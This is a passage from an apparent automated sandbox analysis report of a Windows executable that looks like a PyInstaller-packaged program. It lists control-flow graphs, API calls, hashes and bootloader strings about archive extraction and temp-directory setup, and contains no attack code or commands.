7ff6266417c3 468->471 469->470 474 7ff6266417fd 470->474 471->474 474->451
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2050909247-1550345328
                                                              • Opcode ID: bc3b6ad1d72ad9a9067b3a27b155e00267b771eeaeabf2a6be8fdbbb9eca8f82
                                                              • Instruction ID: 9fd49d4c37a0bdb35a722818300c5b6cbf9a551bb22c82d0cf9a393ea00ed500
                                                              • Opcode Fuzzy Hash: bc3b6ad1d72ad9a9067b3a27b155e00267b771eeaeabf2a6be8fdbbb9eca8f82
                                                              • Instruction Fuzzy Hash: 9B51BD21B0C64392EE20AB12EC611B9A390BF80794F444135EE0C97B96DF7EF555AB43

                                                              Control-flow Graph

                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF626643CBB), ref: 00007FF6266488F4
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF626643CBB), ref: 00007FF6266488FA
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF626643CBB), ref: 00007FF62664893C
                                                                • Part of subcall function 00007FF626648A20: GetEnvironmentVariableW.KERNEL32(00007FF62664388E), ref: 00007FF626648A57
                                                                • Part of subcall function 00007FF626648A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF626648A79
                                                                • Part of subcall function 00007FF6266582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266582C1
                                                                • Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 3563477958-1339014028
                                                              • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                              • Instruction ID: d1c2097c09a65ae52e3de87895b7cb93a422814bcefb53fe74365e0db9a5539d
                                                              • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                              • Instruction Fuzzy Hash: FF41A221A19A8354FE20AB66AC662B91391BF857C4F400135ED0DC77D6DE7EE504EB03

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 599 7ff626641210-7ff62664126d call 7ff62664bdf0 602 7ff626641297-7ff6266412af call 7ff626654fb4 599->602 603 7ff62664126f-7ff626641296 call 7ff626642710 599->603 608 7ff6266412b1-7ff6266412cf call 7ff626654f78 call 7ff626642910 602->608 609 7ff6266412d4-7ff6266412e4 call 7ff626654fb4 602->609 621 7ff626641439-7ff62664144e call 7ff62664bad0 call 7ff626654fa0 * 2 608->621 615 7ff626641309-7ff62664131b 609->615 616 7ff6266412e6-7ff626641304 call 7ff626654f78 call 7ff626642910 609->616 617 7ff626641320-7ff626641345 call 7ff62665040c 615->617 616->621 628 7ff62664134b-7ff626641355 call 7ff626650180 617->628 629 7ff626641431 617->629 636 7ff626641453-7ff62664146d 621->636 628->629 635 7ff62664135b-7ff626641367 628->635 629->621 637 7ff626641370-7ff626641398 call 7ff62664a230 635->637 640 7ff626641416-7ff62664142c call 7ff626642710 637->640 641 7ff62664139a-7ff62664139d 637->641 640->629 643 7ff626641411 641->643 644 7ff62664139f-7ff6266413a9 641->644 643->640 645 7ff6266413ab-7ff6266413b9 call 7ff626650b4c 644->645 646 7ff6266413d4-7ff6266413d7 644->646 650 7ff6266413be-7ff6266413c1 645->650 647 7ff6266413d9-7ff6266413e7 call 7ff626669ea0 646->647 648 7ff6266413ea-7ff6266413ef 646->648 647->648 648->637 652 7ff6266413f5-7ff6266413f8 648->652 653 7ff6266413cf-7ff6266413d2 650->653 654 7ff6266413c3-7ff6266413cd call 7ff626650180 650->654 656 7ff62664140c-7ff62664140f 652->656 657 7ff6266413fa-7ff6266413fd 652->657 653->640 654->648 654->653 656->629 657->640 659 7ff6266413ff-7ff626641407 657->659 659->617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2050909247-2813020118
                                                              • Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                              • Instruction ID: 515ac213b7c1416dcf2ad6108da10ef69b9e6f03d4c0f8439df40bd4a45c629f
                                                              • Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                              • Instruction Fuzzy Hash: 2951D622A0864281EE709B16EC603BAA691FF85794F444131ED4DD7BC6EF7EE541EB03

                                                              Control-flow Graph

                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62665F11A,?,?,-00000018,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EEFC
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62665F11A,?,?,-00000018,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EF08
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                              • Instruction ID: eefb4ea9b3849d784e0029f3cee8cd32d2a6c79f7804c6edab273b240fc2dec5
                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                              • Instruction Fuzzy Hash: D9414321B28A5281FF16CB52AC456752391BF49BD0F884139EC1DCB385EF3EE405AB83

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF626643804), ref: 00007FF6266436E1
                                                              • GetLastError.KERNEL32(?,00007FF626643804), ref: 00007FF6266436EB
                                                                • Part of subcall function 00007FF626642C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
                                                                • Part of subcall function 00007FF626642C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
                                                                • Part of subcall function 00007FF626642C50: MessageBoxW.USER32 ref: 00007FF626642D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 3187769757-2863816727
                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                              • Instruction ID: 45570c8619e57c85d043a01ff9e3b1bf66a306f24de0ca0e2fbf7e7fec32540f
                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                              • Instruction Fuzzy Hash: 47217E61B1C643D1FE30AB21FC603BA2251BF88344F404232D59DC26D5EE6EE504AB47

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 744 7ff62665bacc-7ff62665baf2 745 7ff62665bb0d-7ff62665bb11 744->745 746 7ff62665baf4-7ff62665bb08 call 7ff626654f58 call 7ff626654f78 744->746 748 7ff62665bee7-7ff62665bef3 call 7ff626654f58 call 7ff626654f78 745->748 749 7ff62665bb17-7ff62665bb1e 745->749 760 7ff62665befe 746->760 768 7ff62665bef9 call 7ff62665a950 748->768 749->748 751 7ff62665bb24-7ff62665bb52 749->751 751->748 754 7ff62665bb58-7ff62665bb5f 751->754 757 7ff62665bb78-7ff62665bb7b 754->757 758 7ff62665bb61-7ff62665bb73 call 7ff626654f58 call 7ff626654f78 754->758 763 7ff62665bee3-7ff62665bee5 757->763 764 7ff62665bb81-7ff62665bb87 757->764 758->768 766 7ff62665bf01-7ff62665bf18 760->766 763->766 764->763 765 7ff62665bb8d-7ff62665bb90 764->765 765->758 769 7ff62665bb92-7ff62665bbb7 765->769 768->760 772 7ff62665bbea-7ff62665bbf1 769->772 773 7ff62665bbb9-7ff62665bbbb 769->773 777 7ff62665bbc6-7ff62665bbdd call 7ff626654f58 call 7ff626654f78 call 7ff62665a950 772->777 778 7ff62665bbf3-7ff62665bc1b call 7ff62665d66c call 7ff62665a9b8 * 2 772->778 775 7ff62665bbbd-7ff62665bbc4 773->775 776 7ff62665bbe2-7ff62665bbe8 773->776 775->776 775->777 780 7ff62665bc68-7ff62665bc7f 776->780 809 7ff62665bd70 777->809 805 7ff62665bc1d-7ff62665bc33 call 7ff626654f78 call 7ff626654f58 778->805 806 7ff62665bc38-7ff62665bc63 call 7ff62665c2f4 778->806 783 7ff62665bcfa-7ff62665bd04 call 7ff62666398c 780->783 784 7ff62665bc81-7ff62665bc89 780->784 797 7ff62665bd0a-7ff62665bd1f 783->797 798 7ff62665bd8e 783->798 784->783 789 7ff62665bc8b-7ff62665bc8d 784->789 789->783 793 7ff62665bc8f-7ff62665bca5 789->793 793->783 794 7ff62665bca7-7ff62665bcb3 793->794 794->783 799 7ff62665bcb5-7ff62665bcb7 794->799 797->798 803 7ff62665bd21-7ff62665bd33 GetConsoleMode 797->803 801 7ff62665bd93-7ff62665bdb3 ReadFile 798->801 799->783 804 7ff62665bcb9-7ff62665bcd1 799->804 807 7ff62665bead-7ff62665beb6 GetLastError 801->807 808 7ff62665bdb9-7ff62665bdc1 801->808 803->798 810 7ff62665bd35-7ff62665bd3d 803->810 804->783 812 7ff62665bcd3-7ff62665bcdf 804->812 805->809 806->780 817 7ff62665beb8-7ff62665bece call 7ff626654f78 call 7ff626654f58 807->817 818 7ff62665bed3-7ff62665bed6 807->818 808->807 814 7ff62665bdc7 808->814 811 7ff62665bd73-7ff62665bd7d call 7ff62665a9b8 809->811 810->801 816 7ff62665bd3f-7ff62665bd61 ReadConsoleW 810->816 811->766 812->783 821 7ff62665bce1-7ff62665bce3 812->821 825 7ff62665bdce-7ff62665bde3 814->825 827 7ff62665bd63 GetLastError 816->827 828 7ff62665bd82-7ff62665bd8c 816->828 817->809 822 7ff62665bedc-7ff62665bede 818->822 823 7ff62665bd69-7ff62665bd6b call 7ff626654eec 818->823 821->783 831 7ff62665bce5-7ff62665bcf5 821->831 822->811 823->809 825->811 833 7ff62665bde5-7ff62665bdf0 825->833 827->823 828->825 831->783 837 7ff62665be17-7ff62665be1f 833->837 838 7ff62665bdf2-7ff62665be0b call 7ff62665b6e4 833->838 841 7ff62665be9b-7ff62665bea8 call 7ff62665b524 837->841 842 7ff62665be21-7ff62665be33 837->842 846 7ff62665be10-7ff62665be12 838->846 841->846 843 7ff62665be35 842->843 844 7ff62665be8e-7ff62665be96 842->844 847 7ff62665be3a-7ff62665be41 843->847 844->811 846->811 849 7ff62665be7d-7ff62665be88 847->849 850 7ff62665be43-7ff62665be47 847->850 849->844 851 7ff62665be49-7ff62665be50 850->851 852 7ff62665be63 850->852 851->852 853 7ff62665be52-7ff62665be56 851->853 854 7ff62665be69-7ff62665be79 852->854 853->852 855 7ff62665be58-7ff62665be61 853->855 854->847 856 7ff62665be7b 854->856 855->854 856->844
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                              • Instruction ID: 7140218179b5e8749c6ea5133099ebce6bead08841de322266866f34a0a55e88
                                                              • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                              • Instruction Fuzzy Hash: 48C1C7A290C68781EF609B1598522BD7764FB81BC0F594131EA4E837D3CF7EE855AB03

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                              • Instruction ID: 71a3e350bc318ab344050ccc4a8136ee90ffad9eb8f84e3045c560a7cf2206e8
                                                              • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                              • Instruction Fuzzy Hash: BA215831A0C68395DF109B59B854169A7A0FFC57A0F100235D66D83AE4DEADD4549F43

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00007FF626648760: GetCurrentProcess.KERNEL32 ref: 00007FF626648780
                                                                • Part of subcall function 00007FF626648760: OpenProcessToken.ADVAPI32 ref: 00007FF626648793
                                                                • Part of subcall function 00007FF626648760: GetTokenInformation.KERNELBASE ref: 00007FF6266487B8
                                                                • Part of subcall function 00007FF626648760: GetLastError.KERNEL32 ref: 00007FF6266487C2
                                                                • Part of subcall function 00007FF626648760: GetTokenInformation.KERNELBASE ref: 00007FF626648802
                                                                • Part of subcall function 00007FF626648760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62664881E
                                                                • Part of subcall function 00007FF626648760: CloseHandle.KERNEL32 ref: 00007FF626648836
                                                              • LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF62664916C
                                                              • LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF626649175
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                              • Instruction ID: 9aee3baf377f608468a8f842ebd0bd00518453cfd8b55bb820aefac7871e31fc
                                                              • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                              • Instruction Fuzzy Hash: AD214F31A0874282EE24AB11ED253EA6365FF84780F444135EA4DD3796DF7EE845EB43

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 963 7ff62665cfd0-7ff62665cff5 964 7ff62665cffb-7ff62665cffe 963->964 965 7ff62665d2c3 963->965 966 7ff62665d037-7ff62665d063 964->966 967 7ff62665d000-7ff62665d032 call 7ff62665a884 964->967 968 7ff62665d2c5-7ff62665d2d5 965->968 970 7ff62665d065-7ff62665d06c 966->970 971 7ff62665d06e-7ff62665d074 966->971 967->968 970->967 970->971 973 7ff62665d076-7ff62665d07f call 7ff62665c390 971->973 974 7ff62665d084-7ff62665d099 call 7ff62666398c 971->974 973->974 978 7ff62665d1b3-7ff62665d1bc 974->978 979 7ff62665d09f-7ff62665d0a8 974->979 980 7ff62665d1be-7ff62665d1c4 978->980 981 7ff62665d210-7ff62665d235 WriteFile 978->981 979->978 982 7ff62665d0ae-7ff62665d0b2 979->982 985 7ff62665d1fc-7ff62665d20e call 7ff62665ca88 980->985 986 7ff62665d1c6-7ff62665d1c9 980->986 983 7ff62665d237-7ff62665d23d GetLastError 981->983 984 7ff62665d240 981->984 987 7ff62665d0c3-7ff62665d0ce 982->987 988 7ff62665d0b4-7ff62665d0bc call 7ff626654830 982->988 983->984 993 7ff62665d243 984->993 1007 7ff62665d1a0-7ff62665d1a7 985->1007 994 7ff62665d1cb-7ff62665d1ce 986->994 995 7ff62665d1e8-7ff62665d1fa call 7ff62665cca8 986->995 990 7ff62665d0df-7ff62665d0f4 GetConsoleMode 987->990 991 7ff62665d0d0-7ff62665d0d9 987->991 988->987 998 7ff62665d0fa-7ff62665d100 990->998 999 7ff62665d1ac 990->999 991->978 991->990 1001 7ff62665d248 993->1001 1002 7ff62665d254-7ff62665d25e 994->1002 1003 7ff62665d1d4-7ff62665d1e6 call 7ff62665cb8c 994->1003 995->1007 1005 7ff62665d106-7ff62665d109 998->1005 1006 7ff62665d189-7ff62665d19b call 7ff62665c610 998->1006 999->978 1008 7ff62665d24d 1001->1008 1009 7ff62665d2bc-7ff62665d2c1 1002->1009 1010 7ff62665d260-7ff62665d265 1002->1010 1003->1007 1013 7ff62665d10b-7ff62665d10e 1005->1013 1014 7ff62665d114-7ff62665d122 1005->1014 1006->1007 1007->1001 1008->1002 1009->968 1016 7ff62665d267-7ff62665d26a 1010->1016 1017 7ff62665d293-7ff62665d29d 1010->1017 1013->1008 1013->1014 1022 7ff62665d124 1014->1022 1023 7ff62665d180-7ff62665d184 1014->1023 1018 7ff62665d26c-7ff62665d27b 1016->1018 1019 7ff62665d283-7ff62665d28e call 7ff626654f34 1016->1019 1020 7ff62665d2a4-7ff62665d2b3 1017->1020 1021 7ff62665d29f-7ff62665d2a2 1017->1021 1018->1019 1019->1017 1020->1009 1021->965 1021->1020 1025 7ff62665d128-7ff62665d13f call 7ff626663a58 1022->1025 1023->993 1029 7ff62665d177-7ff62665d17d GetLastError 1025->1029 1030 7ff62665d141-7ff62665d14d 1025->1030 1029->1023 1031 7ff62665d16c-7ff62665d173 1030->1031 1032 7ff62665d14f-7ff62665d161 call 7ff626663a58 1030->1032 1031->1023 1033 7ff62665d175 1031->1033 1032->1029 1036 7ff62665d163-7ff62665d16a 1032->1036 1033->1025 1036->1031
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D0EC
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D177
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                              • Instruction ID: c47d77fa4b4835e9aa27897f6ed74f9962e318b048ebcc3636f6b5a1fb7d199d
                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                              • Instruction Fuzzy Hash: 6191E832F1865295FF609F659C4127D2BA0BB40B88F144139DE0E976D6CE3ED482EB07
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                              • Instruction ID: b669968a294d62a610042981cd76d72068ba7b7358f279315f5ff6592d131470
                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                              • Instruction Fuzzy Hash: 3841B222D2878283EB109B2199553797360FB947A4F108334EA9C43AD2DF7DB5E09B03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                              • Instruction ID: 5070e567eb79f1ce9303508210198623c0d947ba0dee6997caae636c2699bd51
                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                              • Instruction Fuzzy Hash: 3E314E20E4868385FE74AB249C723B92792BF41784F444435D94DC73D7DEAEA405EB63
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
